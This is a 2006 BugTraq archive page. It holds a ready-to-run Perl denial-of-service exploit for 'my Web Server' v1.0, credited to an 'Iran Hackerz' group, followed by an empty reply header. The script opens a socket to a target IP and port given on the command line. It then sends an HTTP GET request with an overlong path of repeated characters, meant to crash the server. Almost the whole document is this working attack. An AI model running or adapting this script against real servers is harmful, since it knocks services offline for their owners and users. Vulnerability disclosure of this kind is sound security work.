BugTraq
my Web Server << v-1.0 Denial of Service Exploit May 25 2006 01:35PM
s3rv3r_hack3r yahoo com (1 replies)
#!/usr/bin/perl

#my Web Server << v-1.0 Denial of Service Exploit

#vendor : Eitsop.s5.com

use IO::Socket;

use strict;

my($socket) = "";

if($socket = IO::Socket::INET->new(

PeerAddr => $ARGV[0],

PeerPort => $ARGV[1],

Proto => "TCP"))

{

print "++++++++++++++++++++++++++++++\n";

print "Connecting to $ARGV[0]:$ARGV[1] ...\n";

print "++++++++++++++++++++++++++++++\n";

print "Exploit Send successfuly!!\n";

print "++++++++++++++++++++++++++++++\n";

print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";

close($socket);

}

else

{

print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

print " ___ ___ __ \n";

print " / | \_____ ____ | | __ ___________________ \n";

print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n";

print "\ Y // __ \\ \___| <\ ___/| | \// / \n";

print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n";

print " \/ \/ \/ \/ \/ \/ \n";

print " Iran Hackerz Security Team \n";

print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n";

print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

print "[Usage]perl myws.pl <IP> <Port> \n";

print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

print "[Status]Can Not Connect To >> $ARGV[0]:$ARGV[1] \n";

print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";

}

#EoF

[ reply ]
Re: my Web Server << v-1.0 Denial of Service Exploit May 26 2006 07:09PM
str0ke (str0ke milw0rm com)


 

Privacy Statement
Copyright 2010, SecurityFocus